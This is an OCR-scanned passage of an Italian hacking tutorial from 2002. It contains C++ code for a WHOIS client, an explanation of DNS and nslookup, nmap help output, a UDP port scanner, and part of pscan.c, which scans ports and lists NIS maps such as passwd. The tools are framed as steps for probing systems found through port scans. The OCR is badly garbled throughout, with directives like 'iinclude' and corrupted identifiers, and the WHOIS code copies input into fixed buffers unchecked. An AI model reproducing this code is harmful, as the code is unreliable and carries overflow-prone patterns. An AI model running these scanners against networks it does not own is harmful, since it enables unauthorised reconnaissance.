#if ! defined (AFX__RESOURCE_DLL ) // defined (AFX_ TAFG_ENU) 
Hfdef _WIN32 

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 
ipragma code _page (1252) 
iendif //_WIN32 

iifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 
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END 

2 TEXTINCL UDE DISCARDABLE 
BEGIN 

"tinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCL UDE DISCARDABLE 
BEGIN 

"idefine _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO_OLE__RESOURCES\r\n " 
"idefine _AFX_NO_ TRACKER_RESOURCES \r\n " 
"idefine _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"iif ìdefined (AFX_RESOURCE_DLL) Il defined (AFX_TARG_ENU)\r\n" 

"iifdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"tpragma code_page (1252) \r\n" 

" tendi f //_WIN32\r\n" 

"tinclude " "res\\WhoIsProcessor . rc2 " " // non-Microsoft Visual C++ edited 
resources\r\n " 

"tinclude " "afxres . re" " // Standard components\r\n" 

" tendi f\r\n" 

"\0" 

END 

tendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID value placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "res\\WhoIsProcessor . ico" 

///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog 

// 

IDD_ABOUTBOX DIALOG DISCARDABLE 0, 0, 235, 55 

STYLE DS_MODALFRAME / WS_POPUP / WS_CAPTION / WS_SYSMENU 

CAPTION "About WholsProcessor" 

FONT 8, "MS Sans Serif" 

BEGIN 

ICON IDR_MAINFRAME, IDC_STATIC, 11,17, 20, 20 

LTEXT "WholsProcessor Version 1 . 0" , IDC_STATIC, 40, 10, 119, 8, 

SS_NOPREFIX 

LTEXT "Copyright (C) 2000, Ed Dixon" , IDC_STATIC, 40, 25, 119, 8 

DEFPUSHBUTTON "OK", IDOK, 1 78, 7, 50,14, WSJGROUP 

END 

IDD_WHOISPROCESSOR_DIALOG DIALOGEX 0, 0, 365, 167 

STYLE DS_MODALFRAME / WS_POPUP / WS_VISIBLE / WS_CAPTION / WS_SYSMENU 

EXSTYLE WS_EX_APPWINDOW 

CAPTION "WholsProcessor" 

FONT 8, "MS Sans Serif" 

BEGIN 

DEFPUSHBUTTON "SExit ", IDOK, 322, 7, 38, 14 
DEFPUSHBUTTON "&WHOIS", IDC_WHOIS, 267, 18, 36, 14 
EDITTEXT IDC_ WEB_ADDRESS , 15, 18, 243, 14, ES_AUTOHSCROLL 

GROUPBOX "Whols Processing", IDC_STATIC, 7, 3, 305, 157 

EDITTEXT IDC_EDIT_LIST,16,42,287,109,ES_MULTILINE / 

ES_AUTOVSCROLL / ES^READONLY / WS^VSCROLL 

END 



tifndef _MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Version 

// 
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VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK 0x3fL 
iifdef _DEBUG 

FILEFLAGS Oxl L 
#else 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FILESUB TYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo" 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VALUE "CompanyName", "\0" 

VAL ITE "FileDescrlption", "WholsProcessor MFC Application\0" 
VALUE "FileVersion", "1, 0, 0, 1\0" 
VALUE "InternalName", "WhoIsProcessor\0" 
VALUE "LegalCopyright", "Copyright (C) 2000\0" 
VALUE "LegalTrademarks", "\0" 

VALUE "OriginalFilename", "WholsProcessor . EXE\0" 
VALUE "ProductName" , "WholsProcessor Application\0" 
VALUE "ProductVersion" , "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE " Trans lat ion" , 0x409, 1200 

END 

END 

#endif // !_MAC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

iifdef APSTUDIO__INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD_ABOUTBOX, DIALOG 
BEGIN 

LEFTMARGIN, 7 
RIGHTMARGIN, 228 
TOPMARGIN, 7 
BOTTOMMARGIN, 48 

END 

IDD_WHOISPROCESSOR_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 7 

RIGHTMARGIN, 358 

TOPMARGIN, 7 

BOTTOMMARGIN, 160 

END 

END 

iendif // APSTUDIO^INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// String Table 

// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDS_ABOUTBOX "SAbout WholsProcessor . . . " 

IDP_SOCKETS_INIT_FAILED "Windows sockets initializaticn failed. " 

END 

iendif // English (U.S.) resources 
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iifndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generateci from the TEXTINCLUDE 3 resource. 

// 

idefine _AFX__NO_SPLITTER_RESOURCES 
idefine _AFX_NO_OLE_RESOURCES 
idefine _AFX_NO_TRACKER_RESOURCES 
idefine _AFX_NO_PROPERTY_RESOURCES 

Hf ! defined (AFX__RESOURCE_DLL ) // defined (AFX_ TARG_ENU) 

Hfdef _WIN32 

LANGUAGE 9, 1 

ipragma code _jpage (1252) 

iendif //_WIN32 

iinclude "res\WhoIsProcessor . rc2" // non— Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 



Le funzioni di base legate al Whols sono definite dentro ai seguenti files. 
Il primo si chiama WholsClass.h 



class CWholsClass 




{ 

public: 

// Constructors / Destructors 
CWholsClass () ; 
~CWhoIsClass () ; 




// Routines 

CString Whols (LPCSTR szAddress) ; 

void SetWholsServer (LPCSTR szServerName) ; 




protected: 




CString GetlpFromHost (LPCSTR szHostName) ; 




// Variables 

int m_iWhoIsPort ; 
CString m szWholsServer; 
CString mszWholsServerIP; 




Quest'altro file è II primo si chiama WholsClass.cpp 


iinclude "WholsClass.h" 




CWholsClass : : CWholsClass () 




{ 

// Init variables 

m iWholsPort= IPPORT WHOIS; 
defined in WINSOCK.H 

m_szWhoIsServer = "whois.internic.net"; 
Default server 

m_szWhoIsServerIP = GetlpFromHost (m_szWhoIsServer) ; // 

server 
} 


II 

// 

IP for default 


CWholsClass : : ~CWhoIsClass ( ) 

{ 

} 




void CWholsClass : : SetWholsServer (LPCSTR szServerName) 
{ 
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m_szWhoIsServer = szServerName ; 

m szWholsServerIP = GetlpFromHost (szServerName) ; 



CString CWholsClass : :WhoIs (LPCSTR szAddress) 
{ 

char szQuery[512] ; 
char szBuffer [128] ; 
CString szResult = ""; 

// Set query string 

strcpy (szQuery, szAddress) ; 
strcat (szQuery, " \r\n") ; 

// Create socket 

CSocket socket ; 
socket . Create () ; 

// Connect to server 

int iResult = socket . Connect (m_szWhoIsServerIP, IPPORT_WHOIS) ; 

// Quit on error 

if (iResult <= 0) 

return szResult; 

// Send whois query 

iResult = socket . Send (szQuery , strlen (szQuery) ) ; 

// Quit on error 

if (iResult <= 0) 

return szResult; 

// Get result 

szResult = ""; 
while (TRUE) 
{ 

// Clear buffer before each iteration 

memset (szBuffer, 0, 128) ; 

// Try to receive some data 

iResult = socket .Receive (szBuffer, 100); 

// Quit if no more data 

if (iResult <= 0) 
break; 

// Add this data to the result string 

szResult += szBuffer ; 

} 

// Close socket 

socket . Close () ; 

// Return result 

return szResult; 

} 



CString CWholsClass :: GetlpFromHost (LPCSTR szHostName) 
{ 

int i,j; 

CString szResult = ""; 

// Convert host name to IP address 

hostent* pHost = gethostbyname (szHostName) ; 

for(i = 0; pHost!= NULL && pHost->h_addr_list [i] ! = NULL; i++) 
{ 

for(j = 0; j < pHost->h_length ; j++) 
{ 

CString addr; 

if(j > 0) 

szResult += ". "; 
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addr . Format (" %u " , (unsigned int) ( (unsigned char*) pHost- 


>h_addr_list [i]) [j]); 






szResult += addr; 


} 




} 





Ora è il momento del codice legato alla gestione della dialog. 

#i f ! defined (AFX_ WHOISPROCESSORDLG_H D 7B5 638 6__E92F__11D3_BB31_ 000 OCOA 7F7E4 INCLUDED_ ) 

idefine AFX_WHOISPROCESSORDLG_H D7B56386__E92F_11D3_BB31_0000C0A7F7E4 INCLUDED_ 

#±f _MSC_VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 

///////////////////////////////////////////////////////////////////////////// 
// CWhoIsProcessorDlg dialog 

class CWhoIsProcessorDlg : public CDialog 
{ 

// Construction 
public: 

CWhoIsProcessorDlg (CWnd* pParent = NULL) ; // standard constructor 

// Dialog Data 

//{ {AFX_DATA (CWhoIsProcessorDlg) 

enum { IDD = IDD_WHOISPROCESSOR_DIALOG }; 

CEdit m_EditList; 

//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

/ 7 { {AFX_VIRTUAL (CWhoIsProcessorDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

HICON m^hlcon; 

// Generated message map functions 
//{ {AFX^MSG (CWhoIsProcessorDlg) 
virtual BOOL OnlnitDialog () ; 

afx_msg void OnSysCommand (UINT nID, LPARAM lParam) ; 

afx_msg void OnPaintf); 

afx_msg HCURSOR OnQueryDraglcon ( ) ; 

afx_msg void OnWhols () ; 

//} }AFX_MSG 

DECLARE_MESSAGE_MAP () 

}; 

//{ (AFX_INSERT_LOCATION) } 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line , 

#endif // 

!defined(AFX_WHOISPROCESSORDLG_H_D7B56386_E92F_11D3_BB31_0000C0A7F7E 

4_INCLUDED_) 



Il suo file .CPP è il seguente : 

^include "stdafx.h" 
^include "WholsProcessor . h" 
^include "WhoIsProcessorDlg . h" 



Hnclude "WholsClass . h" 
^include "WholsClass . cpp" 
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§ifdef _DEBUG 
idefine new DEBUG_NEW 
#undef THIS^FILE 

static char THIS_FILE[] = FILE_ 

#endif 



///////////////////////////////////////////////////////////////////////////// 
// CAboutDlg dlalog used for App About 

class CAboutDlg : public CDialog 
{ 

public: 

CAboutDlg () ; 

// Dialog Data 

//{ {AFX_DATA (CAboutDlg) 
enum { IDD = IDD_ABOUTBOX }; 
//} }AFX_DATA 

// ClassWizard generated virtual function overrides 

/ / { {AFXJVIRTVAL (CAboutDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

//{ {AFX MSG (CAboutDlg) 

//} }AFX__MSG 

DECLARE_MESSAGE_MAP () 

}; 

CAboutDlg: -.CAboutDlg () : CDialog (CAboutDlg: : IDD) 
{ 

//{ {AFX_DATA_INIT (CAboutDlg) 
//} }AFX_DATA_INIT 

} 

void CAboutDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
//( {AFX_DATA_MAP (CAboutDlg) 
//} }AFX_DATA_MAP 

) 

BEGIN_MESSAGE_MAP (CAboutDlg, CDialog) 

// { {AFX_MSG_MAP (CAboutDlg) 

// No message handlers 

//} }AFX_MSG_MAP 
END__MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CWhoIsProcessorDlg dialog 

CWhoIsProcessorDlg: : CWhoIsProcessorDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CWhoIsProcessorDlg :: IDD, pParent) 

{ 

//{ {AFX_DATA_INIT (CWhoIsProcessorDlg) 
//} }AFX DATA INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp () ->LoadIcon (IDR_MAINFRAME) ; 

} 

void CWhoIsProcessorDlg: : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: : DoDataExchange (pDX) ; 
//{ (AFX_DATA_MAP (CWhoIsProcessorDlg) 
DDX_Control (pDX, IDC_EDIT_LIST, m_EditList) ; 
//} }AFX_DATA_MAP 

ì 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



//{ {AFX_MSG_MAP (CWhoIsProcBssorDlg) 
ON_WM_SYSCOMMAND () 
ON_WM_PAINT() 
ON_ WM_QUER YDRAGICON ( ) 
ON_BN_CLICKED(IDC_WHOIS, OnWhols) 
//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CWhoIsProcessorDlg message handlers 

BOOL CWhoIsProcessorDlg: : OnlnitDialog () 
{ 

CDialog: : OnlnitDialog ( ) ; 

// IDM_ABOUTBOX must be in the system command range. 
ASSERT ( (IDM_ABOUTBOX £ OxFFFO) == IDM_ABOUTBOX) ; 
ASSERT ( IDM_ABOUTBOX < OxFOOO) ; 

CMenu* pSysMenu = GetSystemMenu (FALSE) ; 

if (pSysMenu != NULL) 

{ 

CString strAboutMenu; 

strAboutMenu . LoadString (IDS__ABOUTBOX) ; 

if (! strAboutMenu. IsEmpty () ) 

{ 

pSysMenu->AppendMenu (MF_SEPARATOR) ; 

pSysMenu->AppendMenu (MF STRING, IDM_ABOUTBOX, strAboutMenu) ; 

) 

) 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_h!con, TRUE) ; // Set big icon 

Setlcon (mhlcon, FALSE) ; // Set small icon 

SetDlgltemText (IDC_WEB_ADDRESS, "microsoft . com ") ; 

return TRUE; // return TRUE unless you set the focus to a control 

} 



void CWhoIsProcessorDlg: : OnSysCommand (UINT nID, LPARAM lParam) 
{ 

if ((nID & OxFFFO) == IDM_ABOUTBOX) 
{ 

CAboutDlg dlgAbout; 
dlgAbout . DoModal () ; 

} 

else 
{ 

CDialog: : OnSysCommand (nID, lParam) ; 

} 

} 

// If you add a minimize button to your dialog, you will need the code below 
// to draw the icon. For MFC applications using the document/view model, 
// this is automatically done for you by the framework. 

void CWhoIsProcessorDlg: :OnPaint () 
{ 

if (IsIconicO) 
{ 

CPaintDC de (this); // device context for painting 

SendMessage (WM_ICONERASEBKGND , (WPARAM) de . GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect ; 

GetClientRect (Srect) ; 

int x = (rect .Width() - cxlcon + 1) / 2; 
int y = (rect .Height () - cyleon + 1) / 2; 

// Draw the icon 
dc.DrawIcon(x, y, m_hIcon) ; 
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else 
{ 

CDialog: -.OnPaint () ; 



// The system calls this to obtain the cursor to display while the user drags 
// the minimized window. 

HCURSOR CWhoIsProcessorDlg : : OnQueryDraglcon () 
{ 

return (HCURSOR) m_hIcon; 

} 



void CWhoIsProcessorDlg : : OnWhols () 
{ 

// Get input address 

CString szAddress ; 

GetDlgltemText (IDC_WEB__ADDRESS, szAddress) ; 
SetWholsServer ( "whois . networksolutions , com") ; 
CString szResult = whois .Whois (szAddress) ; 
char szBufferln [15000] ; 
char szBufferOut [15000] ; 
strcpy (szBufferln, szResult) ; 
int iCount = 0; 

for (int i = 0 ; i< szResult . GetLength () ; i++) 
{ 

szBufferOut [iCount] = szBufferln [i] ; 
iCount++ ; 

if (szBufferln [i] == '\n') 
{ 

szBufferOut [iCount-1] = '\r'; 
szBufferOut [iCount ] = ' \n ' ; 
iCount++; 

} 

} 

szBufferOut [iCount] = 0; 

m_EditList . SetWindowText (szBufferOut) ; 

ì 

Chiaramente non è assolutamente necessario scriversi questi programmi ma al limite è 
possibile utilizzare qualche Utilities scaricata già pronta dalla rete. 

Ho già detto precedentemente che l'importanza di sapersi scrivere certe Utilities stà nel fatto 

che in questo modo vengono compresi i meccanismi su cui si basano. 

Inoltre allo stato attuale ogni singola utility viene vista alla luce di loro stessa ma la vera utilitì 

potrebbe essere quella di implementare tali funzionalità nell'ambito di programmi molto più 

ampi. 

Un idea che a tempo debito proporrò sarà quella di inserire un piccolo parser di linguaggio e 
mediante questo creare un linguaggio ad HOC indirizzato a creare gestioni particolari. 
Supponente che tutte queste funzioni come ad esempio quella appena vista fossero di fatto il 
corpo esecutivo di qualche statement di un nostro linguaggio. 

Mediante l'interprete di cui parlavamo potremmo creare procedure automatiche per il test e la 
ricerca dei sistemi. 

In ogni caso rinviamo a dopo questo discorso. 

Siamo rimasti al punto in cui tramite un port scanner abbiamo trovato degli IP con delle porte 
aperte. 

Mediante la funzione appena vista chiediamo informazioni legate al dominio in cui tale IP è 
inserito. 

Una volta avute tali informazioni possiamo cercare di individuare la struttura del dominio 
stesso. 

Tale funzione possiamo ottenerla tramite NSLOOKUP o qualsiasi altra Utilities adatta a 
individuare sia i nameservers che gli host inseriti nel dominio stesso. 

Ogni dominio all'atto della registrazione stabilisce due sistemi i quali sono autorizzati a 
distribuire sulla rete i dati relativi alla configurazione del dominio stesso. 
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Questi sono appunto i sistemi definiti con il termine di NAMESERVER e generalmente sono 
due ovvero quello PRIMARIO e quello SECONDARIO. 

Con l'introduzione dei sistemi ACTIVE DIRECTORY di Windows questa distinzione è passata 
di moda in quanto questo sistema riesce a usare tutti i sistemi indipendentemente come se 
tutti fossero primari. 

Ad ogni modo la creazione di un dominio pretende al minimo che vengano definiti i due 
nameservers e almeno un record MX ovvero quello che stabilisce qual è l'host che gestisce 
un mail server del dominio. 

Il fatto che questo sia il minimo indispensabile non significa che generalmente dentro alla 
definizione del dominio ci siano solo questi valori in quanto generalmente vengono definiti 
anche tutti gli indirizzi degli host utilizzati nel dominio stesso. 
Il nome del dominio ad esempio potrebbe essere : 



I vari www, mail e ftp che troviamo davanti ai domini in genere sono i nomi degli hosts. 
Un generico dominio potrebbe essere definito come segue : 



bernardotti.al.it 





NS 


ns1.bernardotti.al.it 




NS 


ns2.bernardotti.al.it 


ns1 


A 


212.210.165.131 


ns2 


A 


212.210.165.130 


www 


A 


212.210.165.135 


mail 


A 


212.210.165.130 


ftp 


A 


212.210.165.130 



L'uso di NSLOOKUP pemette di interrogare un server DNS per avere informazioni legate ad 
un certo dominio. 

Una volta lanciato il programma dobbiamo settare il server che icarichiamo per darci le 
risposte. 

Questa funzione viene eseguita tramite la specifica server. 

y server 151 .99.250.2 

y default server : dns.interbusiness.it 

Ora l'interrogazione potrebbe richiedere soltanto certe tipologie di record come ad esempio 
quelli MX legati ai mailserver oppure potrebbe interessarci avere tutte le informazioni. 
La specifica avviene tramite il SET. 
Specificando : 

y setQ=any 

si fa in modo che vengano restituite tutte le informazioni contenute nella zona. 
La specifica 

y set q=mx 

si richiedono solo i records MX. 

A questo punto specificando il nome dell'host su cui si vogliono le informazioni oppure il nome 

del dominio riceveremo come risposta i dati richiesti. 

Per ricavare tutte le informazioni di un dominio è possibile dare il comando : 
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Avendo a disposizione un programnma come Visual Route o Visual race di McAfee alcune 
informazioni vengono date automaticamente con le funzionalità di trace. 
Nel capitolo legato al protocollo ICMP c'e' un programma per l'esecuzione del TRACEROUTE 
scritto utilizzando appunto questo protocollo. 

Dicevamo prima che una volta avute le informazioni necessarie legate ad un certo dominio è 
possibile utilizzare Utilities più specializzate come ad esempio NMAP. 

NMAP originariamente è sempre stato un programma per ambiente Unix anche se da un 
anno a questa parte ne esiste anche una versione per Windows portato in quest'ambiente 
dalla stessa casa che ha scritto Retina ovvero la Eeye. 

Lanciando NMAP con l'opzione -h relativa all'help si ottengono le varie opzioni possibili da 
specificare sulla linea di comando : 

nmap V. Usage: nmap [Scan Type (s) ] [Optlons] <host or net llst> 
Some Common Scan Types ( ' * ' options requlre root privileges) 
-sT TCP connect () port scan (default) 

* -sS TCP SYN stealth port scan (best all-around TCP scan) 

* -sU UDP port scan 

-sP ping scan (Find any reachable machines) 

* -sF, -sX, -sN Stealth FIN, Xmas, or Nuli scan (experts only) 
-sR/-I RPC/Identd scan (use with other scan types) 

Some Common Options (none are required, most can be combined) : 

* -O Use TCP/IP fi.ngerprinti.ng to guess remote operating system 

-p <range> ports to scan. Example range: ' 1-1024, 1080, 6666, 31337 ' 
-F Only scans ports listed in nmap-services 

-v Verbose. Its use is recommended. Use twice for greater effect. 
-PO Don't ping hosts (needed to scan www.microsoft.com and others) 

* -Ddecoy_hostl, decoy2 [, . . .] Hide scan using many decoys 

-T <Paranoid\ Sneaky \ Polite jNormal / Aggressive \ Insane> General timing 
policy 

-n/-R Never do DNS resolution/Always resolve [default: sometimes 
resolve] 

-0N/-0M <logfile> Output normal /machine parsable scan logs to 
<logfile> 

-iL <inputfile> Get targets from file; Use ' - ' for stdin 

* -S <your_IP>/-e <devicename> Specify source address or network 
interface 

— Interactive Go into Interactive mode (then press h for help) 

iliXclIXip J.Q ,* TlItlSLJp V Sò \J WWW , fliy , COIR J. Ì£ . loo. (/. u/io J. . o o y U . , 

Nel caso in cui si cerchi di identificare quali porte UDP sono aperte su un certo sistema uno 
dei metodi possibili è quello di inviare pacchetti falsi e successivamente attendere il 
messaggio del protocollo ICMP "PORT UNREACHABLE". 

Il seguente programma per Linux utilizza questo meccanismo per scandire le porte UDP. 

iinclude <stdlib.h> 

^include <stdio.h> 

iinclude <sys/socket . h> 

iinclude <sys/types . h> 

iinclude <sys/time.h> 

iinclude <netinet/insystm.h> 

iinclude <netinet/in . h> 

iinclude <netinet/ip . h> 

iinclude <netinet/ip_icmp . h> 

iinclude <arpa/inet . h> 

iinclude <netdb.h> 

iinclude <unistd.h> 

iinclude <strings.h> 

iinclude <errno.h> 

/* Tweak these to make things faster. I 've included getopt as well 

since I'm an option kinda guy ;) */ 

idefine MAXPACKET 4096 
idefine DEFAULT_ TIMEOUT 10 
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idefine DEFAULT_RESEND 6 
idefine SPORT 1 
idefine EPORT 1024 

extern char *optarg; 
extern int optind; 

void usage(char *string) 
{ 

fprintf (stderr, "usage: %s hostname / ipaddr [s start port] [-e end port] [-t 
timeout ] \n ", string) ; 
exit (-1) ; 

} 

void start_scanning (unsigned short sport, unsigned short eport,struct in_addr 

myaddr , unsigned short timeout, int maxretry) 

{ 

struct sockaddr_in myudp; 

char buff[] = "This was a blatant UDP port scan."; 
int udpsock, rawsock, retry, retval, iplen; 
unsigned short port; 
fd_set r; 

struct timeval mytimeout ; 

struct icmp *packet; 

struct ip *iphdr; 

struct servent *service; 

unsigned char recvbuff [MAXPACKET] ; 

if( (udpsock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ) < 0) 
{ 

per r or ( "socket () ") ; 
exit (-1) ; 

} 

if( (rawsock = socket (AF_INET, SOCK_RAW, IPPROTO^ICMP) ) < 0) 
{ 

perror ( "socket () ") ; 
exit (-1) ; 

} 

if(! (sport)) 

sport = SPORT; 
if(! (eport) ) 

eport = EPORT; 
if(! (timeout)) 

timeout = DEFAUL T_ TIMEOUT; 
if ( ! (maxretry) ) 

maxretry = DEFAULT_RESEND ; 

if (sport > eport) 
( 

fprintf (stderr, "Uh you've got the start-port at %u and the end-port at %u this 
doesnt look right . \n" , sport , eport) ; 
exit (-1) ; 

} 

bcopy ( Smyaddr . s^addr, Smyudp. sin__addr . s_addr, sizeof (myaddr. s_addr) ) ; 

myudp. sin^family = AF_INET; 

mytimeout . tv sec = timeout; 
mytimeout . tvusec = 0; 

f or (port = sport; port < eport; port++) 
( 

myudp . sin_port = htons (port) ; 
retry = 0; 

while (retry++ < maxretry) 
{ 

/* I'il use select to do the timeout. Its a bit more 
' portable ' . Than using a signal */ 
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if ( (sendto (udpsock, buff, sizeof (buff) , 0x0, (struct sockaddr 
*) Smyudp, sizeof (myudp) ) ) < 0) 
{ 

perror ( "sendto ") ; 
exit (-1); 

} 

FD_ZERO (Sr) ; 
FD_SET (rawsock, Sr) ; 

retval = select ( (rawsock+1) , Sr, NULL, NULL, Smytimeout) ; 

if(retval) 
{ 

/* We got an answer lets check if its the one we want . */ 

if ( (recvfrom (rawsock, Srecvbuff, sizeof (recvbuff) , 0x0, NULL, NULL) ) < 0) 
{ 

perror ( "Recv") ; 
exit (-1) ; 

} 

/* Problem with getting back the address of the host 
is that not ali hosts will answer icmp unreachable 
directly from thier own host . */ 

iphdr = (struct ip *) recvbuff ; 
iplen = iphdr— >ip__hl « 2; 

packet = (struct icmp *) (recvbuff + iplen); 

if ( (packet->icmp_type == ICMP_UNREACH) SS (packet->icmp_code == 
ICMP_UNREACH_PORT) ) 

break; 

} 

else 

continue; 

} 

if (retry >= maxretry) 
{ 

if ( (service = getservbyport (htons (port) , "udp") ) == NULL) 
fprintf (stdout, "Unknown port %u, open .\n" , port) ; 

else 

fprintf (stdout, "UDP service %s open . \n" , service->s_name) ; 
fflush (stdout) ; 

} 

} 

} 

struct in_addr resolv(char *address) 
{ 

struct in_addr myaddr; 
struct hostent *host; 

if ( (myaddr . s_addr = inet_addr (address) ) == INADDR_NONE) 
( 

if ( (host = gethostbyname (address) ) == NULL) 

fprintf (stderr, "%s Invalid address\n" , address) ; 
else 

{ 

bcopy((int *) * Shost->h_addr, Smyaddr . s__addr, host->h_length) ; 
return myaddr; 

} 

} 



return myaddr; 



int main (int argc, char **argv) 
{ 

unsigned short sport = 0; 
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unsigned short timeout = 0; 
unsigned short maxretry = 0; 
struct in__addr myaddr; 
char c; 

if (argo < 2) 
{ 

usage (argv[0] ) ; 
exit (-1) ; 

} 

while((c = getopt (argc, argv, "s:e:t : r: ") ) .'= EOF) 
{ 

switch (c) 
l 

case ' s ' : 
{ 

sport = (unsigned int) atoi (optarg) ; 
break; 

} 

case ' e ' : 
{ 

eport = (unsigned int) atoi (optarg) ; 
break; 

} 

case ' t ' : 
{ 

timeout = (unsigned int) atoi (optarg) ; 
break; 

} 

case ' r ' : 
{ 

maxretry = (unsigned int) atoi (optarg) ; 
break; 

} 

default : 
{ 

usage (argv[0] ) ; 

} 

} 

} 

myaddr = resolv (argv [optind] ) ; 

start_scanning (sport , eport , myaddr , timeout , maxretry) ; 
exit (0) ; 

} 



PSCAN per Unix 

Un altro scanner sempre per Linux è il seguente. 

Mentre alcune Utilities viste precedentemente utilizzavano le liberie WINSOCK 2 queste 
invece utilizzano le classiche librerie socket di Unix. 

soc = socket (AF_INET, SOCK STREAM, IPPROTO_TCP) ; 

Le opzioni accettate dall' utility sono le seguenti e permettono di stabilire la tipologia dello 
scannino stesso come ad esempio se questo deve essere fatto usando il protocollo TCP 
oppure quello UDP. 

Le opzioni variano a seconda se la compilazione avviene tramite la libreria GNU. 

OPZIONI 

PSCAN <scan type> <host> [low port] [high port] 
dove scan type è no dei seguenti valori : 

SE GNU 

— tcp, -t - TCP port scan 

— udp, -u - UDP port scan 

— rpc, -r - RPC service list 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



— version, -v 


- Print version information 


— help, -h 


- Print usage information 


SE ON GNU 




-t 


- TCP port scan 


-u 


- UDP port scan 


-r 


- RPC service list 


-n 


- NIS map listing 


-v 


- Print version information 



Il sorgente è costituito da un unico file chiamato PSCAN.C 
/* 

* pscan . c 
* 

* UDP port scanning is not implemented because it is a hell of a lot 

* more complicateci than tcp scanning because the connections are 

* connectionless . . . will do it soon. . 
* 

* pluvius@dhp.com 
* 

* tested on SunOS 4 . 1 . 3_U1 and Linux 1.1.85 

* compile: ce -o pscan -s pscan. c 
* 

* NOTE: when you do a NIS listing. . it MUST be the domain name that 

* you pass as the remote host . . otherwise this will not work. 
*/ 



iinclude <stdio.h> 
^include <unistd.h> 
iinclude <netdb.h> 
iinclude <sys/socket . h> 
iinclude <sys/types . h> 
iinclude <netinet/in . h> 
iinclude <rpc/rpc.h> 
iinclude <rpc/xdr.h> 
iinclude <rpc/pmap_prot . h> 
iinclude <rpc/pmap clnt . h> 
iinclude <rpcsvc/yp_prot .h> 
iinclude <rpcsvc/ypclnt . h> 
iinclude <errno.h> 



iifdef GNU_LIBRARY_ 

iinclude <getopt.h> 
ielse 

extern int optind; 
iendif 



/* this is part of the GNU C lib */ 



idefine DEFAULT_LOW_PORT 1 
idefine DEFAULT_HIGH_PORT 2000 



idefine MAJOR_VERSION 1 
idefine MINOR^VERSION 1 



static char sccsid[] = "@ (i) pscan. c 1.1 (pluvius) 01/22/95"; 



typedef enum { 

false, 

true 
} my_bool ; 

typedef enum { 

s_none, 

s_tcp, 

s_udp, 

s_rpc, 

s_nis 
} scan_t; 



iifdef GNU_LIBRARY 

static struct option long_options [ ] = { 
{"tcp", 0, 0, 0}, 
{"udp", 0, 0, 0}, 
{"rpc", 0, 0, 0}, 
{"nis", 0, 0, 0}, 
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("version", 0, 0, 0} , 
10,0, 0,0} 

}; 

iendif 



struct { 

char *al±as; 
char *mapname; 
my_bool inuse; 

} yp_maps[] = { 

{ "passwd", "passwd.byname", false}, 

{ "group", "group .byname" , false}, 

{ "networks" , "networks .byaddr" , false}, 
{"hosts", "hosts. byaddr", false}, 

("protocols" , "protocols .bynumber" , false}, 
{ "services" , " services .byname" , false}, 
{"aliases", "mail . aliases " , false}, 
{"ethers", "ethers .byname" , false}, 

(NULL, NULL, false} 



scan_t scan_type; 
char remote_host [200 ] ; 
char remote_ip [20] ; 
int lowport; 
int high_port; 
int key; 



void print_version (s) 
{ 

fprintf (stderr, "%s version %d. %d\n", s,MAJOR__VERSION,MINOR_VERSION) ; 
exit (0) ; 



void print_usage (s) 
{ 



fprintf (stderr, "usage %s: <scan 
fprintf (stderr, "where scan type . 

iifdef GNU_LIBRARY 

fprintf (stderr, " — tcp, -t 
fprintf (stderr, " — udp, -u 
fprintf (stderr, " — rpc, -r 
fprintf (stderr , " — nis, —n 
fprintf (stderr , " — version, —v 
fprintf (stderr , " — help, —h 

ielse 

